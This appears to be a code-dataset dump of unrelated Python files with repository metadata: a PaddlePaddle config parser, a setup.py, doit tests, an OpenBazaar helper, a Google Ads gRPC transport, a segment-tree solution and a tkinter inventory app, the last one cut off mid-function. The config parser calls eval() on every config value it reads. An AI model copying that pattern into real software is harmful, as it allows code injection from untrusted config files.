# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserve. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. try: from configparser import ConfigParser except BaseException: from ConfigParser import ConfigParser import logging CONFIG_SECS = [ 'train', 'valid', 'test', 'infer', ] def parse_config(cfg_file): """parse_config""" parser = ConfigParser() cfg = AttrDict() parser.read(cfg_file) for sec in parser.sections(): sec_dict = AttrDict() for k, v in parser.items(sec): try: v = eval(v) except BaseException: pass setattr(sec_dict, k, v) setattr(cfg, sec.upper(), sec_dict) return cfg def merge_configs(cfg, sec, args_dict): """merge_configs""" assert sec in CONFIG_SECS, "invalid config section {}".format(sec) sec_dict = getattr(cfg, sec.upper()) for k, v in args_dict.items(): if v is None: continue try: if hasattr(sec_dict, k): setattr(sec_dict, k, v) except BaseException: pass return cfg def print_configs(cfg, mode): """print_configs""" logger = logging.getLogger(__name__) logger.info( "---------------- {:>5} Arguments ----------------".format(mode)) for sec, sec_items in cfg.items(): logger.info("{}:".format(sec)) for k, v in sec_items.items(): logger.info(" {}:{}".format(k, v)) logger.info("-------------------------------------------------") class AttrDict(dict): """AttrDict""" def __getattr__(self, key): return self[key] def __setattr__(self, key, value): if key in self.__dict__: self.__dict__[key] = value else: self[key] = value
27.317647
74
0.594746
753c3e1d1006ffe29675a1567579dd3bea800956
675
py
Python
setup.py
thearn/github-auto-tools
ce9227a2407c45710a09e7a32eebf1568a068c92
[ "Apache-2.0" ]
1
2020-07-16T17:26:11.000Z
2020-07-16T17:26:11.000Z
setup.py
silky/github-auto-tools
ce9227a2407c45710a09e7a32eebf1568a068c92
[ "Apache-2.0" ]
4
2020-11-22T21:11:15.000Z
2020-11-29T15:33:16.000Z
setup.py
silky/github-auto-tools
ce9227a2407c45710a09e7a32eebf1568a068c92
[ "Apache-2.0" ]
1
2016-06-04T09:19:51.000Z
2016-06-04T09:19:51.000Z
from setuptools import setup, find_packages import sys, os setup(name='github_clonetools', version='0.1', description="Command line tools to clone all github repos of a given account", author='Tristan Hearn', author_email='tristanhearn@gmail.com', url='https://github.com/thearn/github-auto-tools', license='Apache 2.0', packages=['github_clonetools'], include_package_data=True, zip_safe=False, entry_points={ 'console_scripts': ['cloneall=github_clonetools.github_all:clone', 'clonerepos=github_clonetools.github_repo:clone', 'clonegists=github_clonetools.github_gists:clone'] } )
30.681818
82
0.69037
83bff45fb9ffa4c4e7cfe41932c8676163d74ec1
5,229
py
Python
tests/test_cmd_resetdep.py
m4ta1l/doit
d1a1b7b3abc7641d977d3b78b580d97aea4e27ea
[ "MIT" ]
1,390
2015-01-01T21:11:47.000Z
2022-03-31T11:35:44.000Z
tests/test_cmd_resetdep.py
m4ta1l/doit
d1a1b7b3abc7641d977d3b78b580d97aea4e27ea
[ "MIT" ]
393
2015-01-05T11:18:29.000Z
2022-03-20T11:46:46.000Z
tests/test_cmd_resetdep.py
m4ta1l/doit
d1a1b7b3abc7641d977d3b78b580d97aea4e27ea
[ "MIT" ]
176
2015-01-07T16:58:56.000Z
2022-03-28T12:12:11.000Z
from io import StringIO import pytest from doit.cmd_resetdep import ResetDep from doit.dependency import TimestampChecker, get_md5, get_file_md5 from doit.exceptions import InvalidCommand from doit.task import Task from tests.conftest import tasks_sample, CmdFactory, get_abspath class TestCmdResetDep(object): def test_execute(self, dep_manager, dependency1): output = StringIO() tasks = tasks_sample() cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks, dep_manager=dep_manager) cmd_reset._execute() got = [line.strip() for line in output.getvalue().split('\n') if line] expected = ["processed %s" % t.name for t in tasks] assert sorted(expected) == sorted(got) def test_file_dep(self, dep_manager, dependency1): my_task = Task("t2", [""], file_dep=['tests/data/dependency1']) output = StringIO() cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task], dep_manager=dep_manager) cmd_reset._execute() got = output.getvalue() assert "processed t2\n" == got dep = list(my_task.file_dep)[0] timestamp, size, md5 = dep_manager._get(my_task.name, dep) assert get_file_md5(get_abspath("data/dependency1")) == md5 def test_file_dep_up_to_date(self, dep_manager, dependency1): my_task = Task("t2", [""], file_dep=['tests/data/dependency1']) dep_manager.save_success(my_task) output = StringIO() cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task], dep_manager=dep_manager) cmd_reset._execute() got = output.getvalue() assert "skip t2\n" == got def test_file_dep_change_checker(self, dep_manager, dependency1): my_task = Task("t2", [""], file_dep=['tests/data/dependency1']) dep_manager.save_success(my_task) dep_manager.checker = TimestampChecker() output = StringIO() cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task], dep_manager=dep_manager) cmd_reset._execute() got = output.getvalue() assert "processed t2\n" == got def test_filter(self, dep_manager, dependency1): output = StringIO() tasks = tasks_sample() cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks, dep_manager=dep_manager) cmd_reset._execute(pos_args=['t2']) got = output.getvalue() assert "processed t2\n" == got def test_invalid_task(self, dep_manager): output = StringIO() tasks = tasks_sample() cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks, dep_manager=dep_manager) pytest.raises(InvalidCommand, cmd_reset._execute, pos_args=['xxx']) def test_missing_file_dep(self, dep_manager): my_task = Task("t2", [""], file_dep=['tests/data/missing']) output = StringIO() cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task], dep_manager=dep_manager) cmd_reset._execute() got = output.getvalue() assert ("failed t2 (Dependent file 'tests/data/missing' does not " "exist.)\n") == got def test_missing_dep_and_target(self, dep_manager, dependency1, dependency2): task_a = Task("task_a", [""], file_dep=['tests/data/dependency1'], targets=['tests/data/dependency2']) task_b = Task("task_b", [""], file_dep=['tests/data/dependency2'], targets=['tests/data/dependency3']) task_c = Task("task_c", [""], file_dep=['tests/data/dependency3'], targets=['tests/data/dependency4']) output = StringIO() tasks = [task_a, task_b, task_c] cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks, dep_manager=dep_manager) cmd_reset._execute() got = output.getvalue() assert ("processed task_a\n" "processed task_b\n" "failed task_c (Dependent file 'tests/data/dependency3'" " does not exist.)\n") == got def test_values_and_results(self, dep_manager, dependency1): my_task = Task("t2", [""], file_dep=['tests/data/dependency1']) my_task.result = "result" my_task.values = {'x': 5, 'y': 10} dep_manager.save_success(my_task) dep_manager.checker = TimestampChecker() # trigger task update reseted = Task("t2", [""], file_dep=['tests/data/dependency1']) output = StringIO() cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[reseted], dep_manager=dep_manager) cmd_reset._execute() got = output.getvalue() assert "processed t2\n" == got assert {'x': 5, 'y': 10} == dep_manager.get_values(reseted.name) assert get_md5('result') == dep_manager.get_result(reseted.name)
42.169355
81
0.605852
d92041b03487fbbcb917e572313bc66fef689c77
1,660
py
Python
node/util.py
martindale/OpenBazaar
620012832d614992d1097f66c75b24c1fa6648e5
[ "MIT" ]
null
null
null
node/util.py
martindale/OpenBazaar
620012832d614992d1097f66c75b24c1fa6648e5
[ "MIT" ]
null
null
null
node/util.py
martindale/OpenBazaar
620012832d614992d1097f66c75b24c1fa6648e5
[ "MIT" ]
1
2020-07-15T05:03:34.000Z
2020-07-15T05:03:34.000Z
import os import sys import webbrowser import platform def is_mac(): os_name = platform.uname()[0] return os_name == 'Darwin' def open_default_webbrowser(url, protocol="http"): """ Open URL at the default browser. @param url: The URL to open. @type url: str @param protocol: The internet protocol to use. @type protocol: str @return: True on success, False on failure. @rtype: bool """ if not url.startswith(protocol): # If protocol is absent from the url, attach it, otherwise # the file `url` will be opened in Linux flavors. full_url = "%s://%s" % (protocol, url) else: full_url = url try: success = webbrowser.open(full_url) except webbrowser.Error: success = False print "[openbazaar:%s.%s] Could not open default web browser at %s" % ( "util", "open_default_webbrowser", url ) return success def osx_check_dyld_library_path(): """This is a necessary workaround as you cannot set the DYLD_LIBRARY_PATH by the time python has started.""" if not os.environ.get('DYLD_LIBRARY_PATH'): print ( 'WARNING: DYLD_LIBRARY_PATH not set, this might cause issues' '\nwith openssl elliptic curve cryptography and other libraries.' '\nIt is recommended that you stop OpenBazaar and set your' '\nDYLD_LIBRARY_PATH environment variable as follows:' '\n export DYLD_LIBRARY_PATH=$(brew --prefix openssl)/' 'lib:${DYLD_LIBRARY_PATH}' '\nthen restart OpenBazaar.' ) sys.exit(1)
28.62069
79
0.61988
d51c28c810964e609fa0edbccaab5a931d8cfc80
10,114
py
Python
google/ads/googleads/v5/services/services/location_view_service/transports/grpc.py
batardo/google-ads-python
a39748521847e85138fca593f3be2681352ad024
[ "Apache-2.0" ]
null
null
null
google/ads/googleads/v5/services/services/location_view_service/transports/grpc.py
batardo/google-ads-python
a39748521847e85138fca593f3be2681352ad024
[ "Apache-2.0" ]
null
null
null
google/ads/googleads/v5/services/services/location_view_service/transports/grpc.py
batardo/google-ads-python
a39748521847e85138fca593f3be2681352ad024
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import warnings from typing import Callable, Dict, Optional, Sequence, Tuple from google.api_core import grpc_helpers # type: ignore from google.api_core import gapic_v1 # type: ignore from google import auth # type: ignore from google.auth import credentials # type: ignore from google.auth.transport.grpc import SslCredentials # type: ignore import grpc # type: ignore from google.ads.googleads.v5.resources.types import location_view from google.ads.googleads.v5.services.types import location_view_service from .base import LocationViewServiceTransport, DEFAULT_CLIENT_INFO class LocationViewServiceGrpcTransport(LocationViewServiceTransport): """gRPC backend transport for LocationViewService. Service to fetch location views. This class defines the same methods as the primary client, so the primary client can load the underlying transport implementation and call it. It sends protocol buffers over the wire using gRPC (which is built on top of HTTP/2); the ``grpcio`` package must be installed. """ def __init__( self, *, host: str = "googleads.googleapis.com", credentials: credentials.Credentials = None, credentials_file: str = None, scopes: Sequence[str] = None, channel: grpc.Channel = None, api_mtls_endpoint: str = None, client_cert_source: Callable[[], Tuple[bytes, bytes]] = None, ssl_channel_credentials: grpc.ChannelCredentials = None, quota_project_id: Optional[str] = None, client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO, ) -> None: """Instantiate the transport. Args: host (Optional[str]): The hostname to connect to. credentials (Optional[google.auth.credentials.Credentials]): The authorization credentials to attach to requests. These credentials identify the application to the service; if none are specified, the client will attempt to ascertain the credentials from the environment. This argument is ignored if ``channel`` is provided. credentials_file (Optional[str]): A file with credentials that can be loaded with :func:`google.auth.load_credentials_from_file`. This argument is ignored if ``channel`` is provided. scopes (Optional(Sequence[str])): A list of scopes. This argument is ignored if ``channel`` is provided. channel (Optional[grpc.Channel]): A ``Channel`` instance through which to make calls. api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint. If provided, it overrides the ``host`` argument and tries to create a mutual TLS channel with client SSL credentials from ``client_cert_source`` or applicatin default SSL credentials. client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]): Deprecated. A callback to provide client SSL certificate bytes and private key bytes, both in PEM format. It is ignored if ``api_mtls_endpoint`` is None. ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials for grpc channel. It is ignored if ``channel`` is provided. quota_project_id (Optional[str]): An optional project to use for billing and quota. client_info (google.api_core.gapic_v1.client_info.ClientInfo): The client info used to send a user-agent string along with API requests. If ``None``, then default info will be used. Generally, you only need to set this if you're developing your own client library. Raises: google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport creation failed for any reason. """ self._ssl_channel_credentials = ssl_channel_credentials if channel: # Sanity check: Ensure that channel and credentials are not both # provided. credentials = False # If a channel was explicitly provided, set it. self._grpc_channel = channel self._ssl_channel_credentials = None elif api_mtls_endpoint: warnings.warn( "api_mtls_endpoint and client_cert_source are deprecated", DeprecationWarning, ) host = ( api_mtls_endpoint if ":" in api_mtls_endpoint else api_mtls_endpoint + ":443" ) if credentials is None: credentials, _ = auth.default( scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id ) # Create SSL credentials with client_cert_source or application # default SSL credentials. if client_cert_source: cert, key = client_cert_source() ssl_credentials = grpc.ssl_channel_credentials( certificate_chain=cert, private_key=key ) else: ssl_credentials = SslCredentials().ssl_credentials # create a new channel. The provided one is ignored. self._grpc_channel = type(self).create_channel( host, credentials=credentials, credentials_file=credentials_file, ssl_credentials=ssl_credentials, scopes=scopes or self.AUTH_SCOPES, quota_project_id=quota_project_id, options=[ ("grpc.max_send_message_length", -1), ("grpc.max_receive_message_length", -1), ], ) self._ssl_channel_credentials = ssl_credentials else: host = host if ":" in host else host + ":443" if credentials is None: credentials, _ = auth.default(scopes=self.AUTH_SCOPES) # create a new channel. The provided one is ignored. self._grpc_channel = type(self).create_channel( host, credentials=credentials, ssl_credentials=ssl_channel_credentials, scopes=self.AUTH_SCOPES, options=[ ("grpc.max_send_message_length", -1), ("grpc.max_receive_message_length", -1), ], ) self._stubs = {} # type: Dict[str, Callable] # Run the base constructor. super().__init__( host=host, credentials=credentials, client_info=client_info, ) @classmethod def create_channel( cls, host: str = "googleads.googleapis.com", credentials: credentials.Credentials = None, scopes: Optional[Sequence[str]] = None, **kwargs, ) -> grpc.Channel: """Create and return a gRPC channel object. Args: address (Optionsl[str]): The host for the channel to use. credentials (Optional[~.Credentials]): The authorization credentials to attach to requests. These credentials identify this application to the service. If none are specified, the client will attempt to ascertain the credentials from the environment. scopes (Optional[Sequence[str]]): A optional list of scopes needed for this service. These are only used when credentials are not specified and are passed to :func:`google.auth.default`. kwargs (Optional[dict]): Keyword arguments, which are passed to the channel creation. Returns: grpc.Channel: A gRPC channel object. """ return grpc_helpers.create_channel( host, credentials=credentials, scopes=scopes or cls.AUTH_SCOPES, **kwargs, ) @property def grpc_channel(self) -> grpc.Channel: """Return the channel designed to connect to this service. """ return self._grpc_channel @property def get_location_view( self, ) -> Callable[ [location_view_service.GetLocationViewRequest], location_view.LocationView, ]: r"""Return a callable for the get location view method over gRPC. Returns the requested location view in full detail. Returns: Callable[[~.GetLocationViewRequest], ~.LocationView]: A function that, when called, will call the underlying RPC on the server. """ # Generate a "stub function" on-the-fly which will actually make # the request. # gRPC handles serialization and deserialization, so we just need # to pass in the functions for each. if "get_location_view" not in self._stubs: self._stubs["get_location_view"] = self.grpc_channel.unary_unary( "/google.ads.googleads.v5.services.LocationViewService/GetLocationView", request_serializer=location_view_service.GetLocationViewRequest.serialize, response_deserializer=location_view.LocationView.deserialize, ) return self._stubs["get_location_view"] __all__ = ("LocationViewServiceGrpcTransport",)
41.281633
90
0.6228
a439b267021d7c5df887c99d6d3d4c3e5e0da21f
4,797
py
Python
segment tree 2/2E.py
iammanish17/CodeforcesEdu
961543b332c773010320bd0b2e9d4a4b1c8dc0ea
[ "MIT" ]
6
2020-09-14T19:16:23.000Z
2021-12-10T19:07:51.000Z
segment tree 2/2E.py
iammanish17/CodeforcesEdu
961543b332c773010320bd0b2e9d4a4b1c8dc0ea
[ "MIT" ]
null
null
null
segment tree 2/2E.py
iammanish17/CodeforcesEdu
961543b332c773010320bd0b2e9d4a4b1c8dc0ea
[ "MIT" ]
1
2021-08-12T19:37:22.000Z
2021-08-12T19:37:22.000Z
# By manish.17, contest: ITMO Academy. Дерево отрезков 2 - 2, problem: (E) Assignment and Minimum # https://codeforces.com/profile/manish.17 import os import sys from io import BytesIO, IOBase BUFSIZE = 8192 class FastIO(IOBase): newlines = 0 def __init__(self, file): self._fd = file.fileno() self.buffer = BytesIO() self.writable = "x" in file.mode or "r" not in file.mode self.write = self.buffer.write if self.writable else None def read(self): while True: b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE)) if not b: break ptr = self.buffer.tell() self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr) self.newlines = 0 return self.buffer.read() def readline(self): while self.newlines == 0: b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE)) self.newlines = b.count(b"\n") + (not b) ptr = self.buffer.tell() self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr) self.newlines -= 1 return self.buffer.readline() def flush(self): if self.writable: os.write(self._fd, self.buffer.getvalue()) self.buffer.truncate(0), self.buffer.seek(0) class IOWrapper(IOBase): def __init__(self, file): self.buffer = FastIO(file) self.flush = self.buffer.flush self.writable = self.buffer.writable self.write = lambda s: self.buffer.write(s.encode("ascii")) self.read = lambda: self.buffer.read().decode("ascii") self.readline = lambda: self.buffer.readline().decode("ascii") sys.stdin, sys.stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout) input = lambda: sys.stdin.readline().rstrip("\r\n") from math import inf, log2 class LazySegmentTree: def __init__(self, array, func=max): self.n = len(array) self.size = 2 ** (int(log2(self.n - 1)) + 1) if self.n != 1 else 1 self.func = func self.default = 0 if self.func != min else inf self.data = [self.default] * (2 * self.size) self.lazy = [None] * (2 * self.size) self.process(array) def process(self, array): self.data[self.size: self.size + self.n] = array for i in range(self.size - 1, -1, -1): self.data[i] = self.func(self.data[2 * i], self.data[2 * i + 1]) def push(self, index): """Push the information of the root to it's children!""" if self.lazy[index] is None or 2*index + 1 >= 2*self.size:return self.lazy[2 * index] = self.lazy[index] self.lazy[2 * index + 1] = self.lazy[index] self.data[2 * index] = self.lazy[index] self.data[2 * index + 1] = self.lazy[index] self.lazy[index] = None def build(self, index, value): """Build data with the new changes!""" index >>= 1 while index: self.data[index] = self.func(self.data[2 * index], self.data[2 * index + 1]) if self.lazy[index] is None else self.lazy[index] index >>= 1 def query(self, alpha, omega): """Returns the result of function over the range (inclusive)!""" res = self.default alpha += self.size omega += self.size + 1 for i in reversed(range(1, alpha.bit_length())): self.push(alpha >> i) for i in range(len(bin(omega - 1)[2:]) - 1, 0, -1): self.push((omega-1) >> i) while alpha < omega: if alpha & 1: res = self.func(res, self.data[alpha]) alpha += 1 if omega & 1: omega -= 1 res = self.func(res, self.data[omega]) alpha >>= 1 omega >>= 1 return res def update(self, alpha, omega, value): alpha += self.size omega += self.size + 1 for i in reversed(range(1, alpha.bit_length())): self.push(alpha >> i) for i in reversed(range(1, omega.bit_length())): self.push(omega >> i) l, r = alpha, omega while alpha < omega: if alpha & 1: self.data[alpha] = value self.lazy[alpha] = value alpha += 1 if omega & 1: omega -= 1 self.data[omega] = value self.lazy[omega] = value alpha >>= 1 omega >>= 1 self.build(l, value) self.build(r - 1, value) n, m = map(int, input().split()) st = LazySegmentTree([0]*n, func=min) for _ in range(m): a = list(map(int, input().split())) if a[0] == 1: st.update(a[1], a[2]-1, a[3]) else: print(st.query(a[1], a[2]-1))
33.545455
138
0.543673
d4a661f5d8a0b900ebf54dfd1e80945fe2156980
26,488
py
Python
Windows_Version.py
radonintro1234/inventory-tracking-system
df26907630a19cb10a720ad111173a381bd530ff
[ "MIT" ]
null
null
null
Windows_Version.py
radonintro1234/inventory-tracking-system
df26907630a19cb10a720ad111173a381bd530ff
[ "MIT" ]
null
null
null
Windows_Version.py
radonintro1234/inventory-tracking-system
df26907630a19cb10a720ad111173a381bd530ff
[ "MIT" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- __version__ = "0.1.1 for Windows 10" __author__ = "Rishi Mule, Shubham Mulik, Gaurav Gend, Vedant Padwal" __license__ = 'MIT' from tkinter import * from tkinter import ttk from tkinter import messagebox from dbToCSV import toCSV from csvToPdf import CsvtoPDF from dialog import OptionDialog import pymysql import sqlite3 def create_database(): """Function to create a Database""" conn = sqlite3.connect('inventory.db') cur = conn.cursor() cur.execute("CREATE TABLE IF NOT EXISTS dmce_inventory (product_id text PRIMARY KEY , product_type text , model_no text , manufacturer text , department text , location text ,incharge text, comment text)") conn.commit() conn.close() #------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- class Inventory(): """Creating a main window on Inventory""" def __init__(self, root): """Default __INIT__ Function""" self.root=root self.root.title("I.T.S - For Datta Meghe College Of Engineering") self.root.geometry("1200x660+160+80") self.root.resizable(0, 0) self.product_id_var = StringVar() self.product_type_var = StringVar() self.model_no_var = StringVar() self.manufacturer_var = StringVar() self.department_var = StringVar() self.location_var = StringVar() self.incharge_var = StringVar() self.search_by_var = StringVar() self.search_txt_var = StringVar() head_title = Label(self.root,text="Inventory Tracking System",bd=10, relief=GROOVE, font=("ariel", 20 , "bold"), bg="RED", fg="white") head_title.pack(side="top", pady=20, padx=10, fill=X) #=================================================================================================================================== #===============================MANAGE_FRAME======================================================================================== #=================================================================================================================================== Manage_Frame=Frame(self.root, bd=5, relief=RIDGE, bg="crimson") Manage_Frame.place(x=10, y=80, width=350, height=570) m_title=Label(Manage_Frame,text="Manage Inventory", font=("", 20 , "bold"), bg="crimson", fg="white") m_title.grid(row=0, columnspan=2, pady=20) #------------------------------------------------------------------------------------------------------------------------------------ def caps(event): """Function to Convert Text To UPPERCAP""" self.product_id_var.set(self.product_id_var.get().upper()) self.product_type_var.set(self.product_type_var.get().upper()) self.model_no_var.set(self.model_no_var.get().upper()) self.manufacturer_var.set(self.manufacturer_var.get().upper()) self.location_var.set(self.location_var.get().upper()) self.incharge_var.set(self.incharge_var.get().upper()) self.search_txt_var.set(self.search_txt_var.get().upper()) #------------------------------------------------------------------------------------------------------------------------------------ lbl_product_id=Label(Manage_Frame,text="Product ID : ", font=("", 10 , "bold"), bg="crimson", fg="white") lbl_product_id.grid(row=1, column=0, padx=10, pady=10,sticky ="w") txt_product_id=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.product_id_var) txt_product_id.bind("<KeyRelease>", caps) txt_product_id.grid(row=1, column=1, padx=10, pady=10, sticky ="w") #------------------------------------------------------------------------------------------------------------------------------------ lbl_type=Label(Manage_Frame,text="Product Type : ", font=("", 10 , "bold"), bg="crimson", fg="white") lbl_type.grid(row=2, column=0, padx=10, pady=10,sticky ="w") txt_type=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.product_type_var) txt_type.bind("<KeyRelease>", caps) txt_type.grid(row=2, column=1, padx=10, pady=10, sticky ="w") #------------------------------------------------------------------------------------------------------------------------------------ lbl_model_no=Label(Manage_Frame,text="Model No : ", font=("", 10 , "bold"), bg="crimson", fg="white") lbl_model_no.grid(row=3, column=0, padx=10, pady=10,sticky ="w") txt_model_id=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.model_no_var) txt_model_id.bind("<KeyRelease>", caps) txt_model_id.grid(row=3, column=1, padx=10, pady=10, sticky ="w") #------------------------------------------------------------------------------------------------------------------------------------ lbl_manufacturer=Label(Manage_Frame,text="Manufacturer : ", font=("", 10 , "bold"), bg="crimson", fg="white") lbl_manufacturer.grid(row=4, column=0, padx=10, pady=10,sticky ="w") txt_manufacturer=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.manufacturer_var) txt_manufacturer.bind("<KeyRelease>", caps) txt_manufacturer.grid(row=4, column=1, padx=10, pady=10, sticky ="w") #------------------------------------------------------------------------------------------------------------------------------------ lbl_department=Label(Manage_Frame,text="Department : ", font=("", 10 , "bold"), bg="crimson", fg="white") lbl_department.grid(row=5, column=0, padx=10, pady=10,sticky ="w") combo_department=ttk.Combobox(Manage_Frame, width=18, font=("", 13, "bold" ), state="readonly" , textvariable=self.department_var) combo_department["values"]=("COMPUTER","ELECTRICAL","CIVIL","MECHANICAL","CHEMICAL","I.T.") combo_department.current(0) combo_department.grid(row=5, column=1, padx=10, pady=10,sticky ="w") #------------------------------------------------------------------------------------------------------------------------------------ lbl_location=Label(Manage_Frame,text="Location : ", font=("", 10 , "bold"), bg="crimson", fg="white") lbl_location.grid(row=6, column=0, padx=10, pady=10,sticky ="w") txt_location=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.location_var) txt_location.bind("<KeyRelease>", caps) txt_location.grid(row=6, column=1, padx=10, pady=10, sticky ="w") #------------------------------------------------------------------------------------------------------------------------------------ lbl_incharge=Label(Manage_Frame,text="Incharge : ", font=("", 10 , "bold"), bg="crimson", fg="white") lbl_incharge.grid(row=7, column=0, padx=10, pady=10,sticky ="w") txt_incharge=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.incharge_var) txt_incharge.bind("<KeyRelease>", caps) txt_incharge.grid(row=7, column=1, padx=10, pady=10, sticky ="w") #------------------------------------------------------------------------------------------------------------------------------------ lbl_comment=Label(Manage_Frame,text="Comment : ", font=("", 10 , "bold"), bg="crimson", fg="white") lbl_comment.grid(row=8, column=0, padx=10, pady=10,sticky ="w") self.txt_comment=Text(Manage_Frame, width=20, height=3, bd=2, relief=GROOVE, font=("times new roman", 13 , "")) self.txt_comment.grid(row=8, column=1, padx=10, pady=10, sticky ="w") #------------------------------------------------------------------------------------------------------------------------------------ #=================================================================================================================================== #==========================BUTTON_FRAME============================================================================================= #=================================================================================================================================== Button_Frame=Frame(Manage_Frame, bd=4, relief=RIDGE, bg="yellow") Button_Frame.place(x=5, y=500, width=330, height=50) #------------------------------------------------------------------------------------------------------------------------------------ add_button=Button(Button_Frame, text="Add", width=8, highlightbackground="yellow", command=self.add_items) add_button.grid(row=0, column=0, padx=5, pady=7) #------------------------------------------------------------------------------------------------------------------------------------ update_button=Button(Button_Frame, text="Update", width=8, highlightbackground="yellow", command=self.update_data) update_button.grid(row=0, column=1, padx=5, pady=7) #------------------------------------------------------------------------------------------------------------------------------------ delete_button=Button(Button_Frame, text="Delete", width=8, highlightbackground="yellow", command=self.delete_data) delete_button.grid(row=0, column=2, padx=5, pady=7) #------------------------------------------------------------------------------------------------------------------------------------ clear_button=Button(Button_Frame, text="Clear", width=10, highlightbackground="yellow", command=self.clear) clear_button.grid(row=0, column=3, padx=5, pady=7) #=================================================================================================================================== #==========================DETAIL_FRAME============================================================================================= #=================================================================================================================================== Detail_Frame=Frame(self.root, bd=4, relief=RIDGE, bg="crimson") Detail_Frame.place(x=370, y=80, width=820, height=570) #=================================================================================================================================== #==========================SEARCH_FRAME============================================================================================= #=================================================================================================================================== Search_Frame=Frame(Detail_Frame, bd=4, relief=RIDGE, bg="yellow") Search_Frame.place(x=10, y=10, width=792, height=60) lbl_search=Label(Search_Frame,text="Search By : ", font=("", 13 , "bold"), bg="yellow", fg="red") lbl_search.grid(row=0, column=0, padx=10, pady=10,sticky ="w") combo_search_by=ttk.Combobox(Search_Frame, width=13, font=("", 13, "" ), state="readonly", textvariable=self.search_by_var) combo_search_by["values"]=("All","Product ID.","Product Type","Model No","Manufacturer","Department","Location","Incharge") combo_search_by.current(0) combo_search_by.grid(row=0, column=1, padx=2, pady=10,sticky ="w") txt_search=Entry(Search_Frame, width=22,font=("times new roman", 15 ) ,bd=2, relief=GROOVE, textvariable=self.search_txt_var) txt_search.bind("<KeyRelease>", caps) txt_search.grid(row=0, column=2, padx=20, pady=10, sticky ="w") search_button=Button(Search_Frame, text="Search", width=8, highlightbackground="yellow", command=self.search_data) search_button.grid(row=0, column=3, padx=4, pady=5) view_button=Button(Search_Frame, text="View All", width=8, highlightbackground="yellow", command=self.view_data) view_button.grid(row=0, column=4, padx=9, pady=5) tocsv_button=Button(Search_Frame, text="Export", width=8, highlightbackground="yellow", command=self.export_data) tocsv_button.grid(row=0, column=5, padx=9, pady=5) #=================================================================================================================================== #==========================TABLE_FRAME============================================================================================= #=================================================================================================================================== Table_Frame=Frame(Detail_Frame, bd=4, relief=RIDGE, bg="yellow") Table_Frame.place(x=10, y=80, width=792, height=472) scroll_x=Scrollbar(Table_Frame, orient=HORIZONTAL) scroll_y=Scrollbar(Table_Frame, orient=VERTICAL) self.View_Table=ttk.Treeview(Table_Frame, columns=("pid","ptype","mno","manufacturer","department","location","incharge","comment"), xscrollcommand=scroll_x.set, yscrollcommand=scroll_y.set) scroll_x.pack(side=BOTTOM, fill=X) scroll_y.pack(side=RIGHT, fill=Y) scroll_x.config(command=self.View_Table.xview) scroll_y.config(command=self.View_Table.yview) self.View_Table.heading("pid", text="Product ID.") self.View_Table.heading("ptype", text="Product Type") self.View_Table.heading("mno", text="Model No") self.View_Table.heading("manufacturer", text="Manufacturer") self.View_Table.heading("department", text="Department") self.View_Table.heading("location", text="Location") self.View_Table.heading("incharge", text="Incharge") self.View_Table.heading("comment", text="Comment") self.View_Table.column("pid", width=90) self.View_Table.column("ptype", width=100) self.View_Table.column("mno", width=120) self.View_Table.column("manufacturer", width=90) self.View_Table.column("department", width=120) self.View_Table.column("location", width=90) self.View_Table.column("incharge", width=130) self.View_Table.column("comment", width=250) self.View_Table["show"]="headings" self.View_Table.pack(fill=BOTH, expand=1) self.View_Table.bind("<ButtonRelease-1>", self.get_cursor) self.view_data() #------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- def add_items(self): """Function to ADD item to Database""" if self.product_id_var.get()=="": messagebox.showerror("Error","Product ID. cannot be blank!!!") else: try: con=sqlite3.connect('inventory.db') cur=con.cursor() cur.execute(" insert into dmce_inventory values (?,?,?,?,?,?,?,?)",( self.product_id_var.get(), self.product_type_var.get(), self.model_no_var.get(), self.manufacturer_var.get(), self.department_var.get(), self.location_var.get(), self.incharge_var.get(), self.txt_comment.get('1.0',END), 